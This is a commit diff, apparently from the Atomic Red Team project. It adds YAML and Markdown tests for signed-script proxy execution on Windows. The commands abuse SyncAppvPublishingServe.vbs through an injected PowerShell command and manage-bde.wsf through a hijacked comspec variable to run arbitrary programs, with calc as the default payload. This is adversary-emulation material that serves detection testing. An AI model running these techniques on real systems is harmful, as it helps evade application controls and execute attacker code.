T1216 Added tests for proxied script execution (#627)

* Added script proxy tests * Generate docs from job=validate_atomics_generate_docs branch=t1216_tests * Moving command * Generate docs from job=validate_atomics_generate_docs branch=t1216_tests
2019-11-14 15:07:28 -06:00
parent d6f8628818
commit fdd2927285
5 changed files with 181 additions and 0 deletions
@@ -10,6 +10,10 @@ There are several other signed scripts that may be used in a similar manner. (Ci

 - [Atomic Test #1 - PubPrn.vbs Signed Script Bypass](#atomic-test-1---pubprnvbs-signed-script-bypass)

+- [Atomic Test #2 - SyncAppvPublishingServe Signed Script PowerShell Command Execution](#atomic-test-2---syncappvpublishingserve-signed-script-powershell-command-execution)
+
+- [Atomic Test #3 - manage-bde.wsf Signed Script Command Execution](#atomic-test-3---manage-bdewsf-signed-script-command-execution)
+

 <br/>

@@ -31,4 +35,55 @@ cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs local



+<br/>
+<br/>
+
+## Atomic Test #2 - SyncAppvPublishingServe Signed Script PowerShell Command Execution
+Executes the signed SyncAppvPublishingServe script with options to execute an arbitrary PowerShell command.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| command_to_execute | A PowerShell command to execute. | string | Start-Process calc|
+
+#### Run it with `command_prompt`! 
+```
+C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}”
+```
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - manage-bde.wsf Signed Script Command Execution
+Executes the signed manage-bde.wsf script with options to execute an arbitrary command.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| command_to_execute | A command to execute. | Path | C:\Windows\System32\calc.exe|
+
+#### Run it with `command_prompt`! 
+```
+set comspec=#{command_to_execute}
+cscript manage-bde.wsf
+```
+
+#### Commands to Check Prerequisites:
+```
+
+```
+
+#### Cleanup Commands:
+```
+set comspec=C:\Windows\System32\cmd.exe
+```
+
 <br/>
@@ -21,3 +21,45 @@ atomic_tests:
    elevation_required: false
    command: |
      cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
+
+- name: SyncAppvPublishingServe Signed Script PowerShell Command Execution
+  description: |
+    Executes the signed SyncAppvPublishingServe script with options to execute an arbitrary PowerShell command.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    command_to_execute:
+      description: A PowerShell command to execute.
+      type: string
+      default: Start-Process calc
+
+  executor:
+    name: command_prompt
+    elevation_required: false
+    command: |
+      C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}”
+
+- name: manage-bde.wsf Signed Script Command Execution
+  description: |
+    Executes the signed manage-bde.wsf script with options to execute an arbitrary command.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    command_to_execute:
+      description: A command to execute.
+      type: Path
+      default: C:\Windows\System32\calc.exe
+
+  executor:
+    name: command_prompt
+    elevation_required: false
+    prereq_command: | # for the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success. You can remove the prereq_command section if there are no pre-req's
+    command: | # these are the actaul attack commands, at least one command must be provided
+      set comspec=#{command_to_execute}
+      cscript manage-bde.wsf
+    cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
+      set comspec=C:\Windows\System32\cmd.exe
@@ -363,6 +363,8 @@
  - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
 - [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
  - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
+  - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
+  - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
 - T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1151 Space after Filename](./T1151/T1151.md)
  - Atomic Test #1: Space After Filename [macos]
@@ -747,6 +749,8 @@
  - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
 - [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
  - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
+  - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
+  - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
 - [T1153 Source](./T1153/T1153.md)
  - Atomic Test #1: Execute Script using Source [macos, linux]
  - Atomic Test #2: Execute Script using Source Alias [macos, linux]
@@ -10664,6 +10664,44 @@ defense-evasion:
          localhost "script:#{remote_payload}"

 '
+    - name: SyncAppvPublishingServe Signed Script PowerShell Command Execution
+      description: 'Executes the signed SyncAppvPublishingServe script with options
+        to execute an arbitrary PowerShell command.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        command_to_execute:
+          description: A PowerShell command to execute.
+          type: string
+          default: Start-Process calc
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: 'C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}”
+
+'
+    - name: manage-bde.wsf Signed Script Command Execution
+      description: 'Executes the signed manage-bde.wsf script with options to execute
+        an arbitrary command.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        command_to_execute:
+          description: A command to execute.
+          type: Path
+          default: C:\Windows\System32\calc.exe
+      executor:
+        name: command_prompt
+        elevation_required: false
+        prereq_command: ''
+        command: |
+          set comspec=#{command_to_execute}
+          cscript manage-bde.wsf
+        cleanup_command: set comspec=C:\Windows\System32\cmd.exe
  T1151:
    technique:
      x_mitre_data_sources:
@@ -21091,6 +21129,44 @@ execution:
          localhost "script:#{remote_payload}"

 '
+    - name: SyncAppvPublishingServe Signed Script PowerShell Command Execution
+      description: 'Executes the signed SyncAppvPublishingServe script with options
+        to execute an arbitrary PowerShell command.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        command_to_execute:
+          description: A PowerShell command to execute.
+          type: string
+          default: Start-Process calc
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: 'C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}”
+
+'
+    - name: manage-bde.wsf Signed Script Command Execution
+      description: 'Executes the signed manage-bde.wsf script with options to execute
+        an arbitrary command.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        command_to_execute:
+          description: A command to execute.
+          type: Path
+          default: C:\Windows\System32\calc.exe
+      executor:
+        name: command_prompt
+        elevation_required: false
+        prereq_command: ''
+        command: |
+          set comspec=#{command_to_execute}
+          cscript manage-bde.wsf
+        cleanup_command: set comspec=C:\Windows\System32\cmd.exe
  T1153:
    technique:
      x_mitre_data_sources:
@@ -151,6 +151,8 @@
  - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
 - [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
  - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
+  - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
+  - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
 - T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1099 Timestomp](./T1099/T1099.md)
@@ -609,6 +611,8 @@
  - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
 - [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
  - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
+  - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
+  - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
 - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1127 Trusted Developer Utilities](./T1127/T1127.md)
  - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]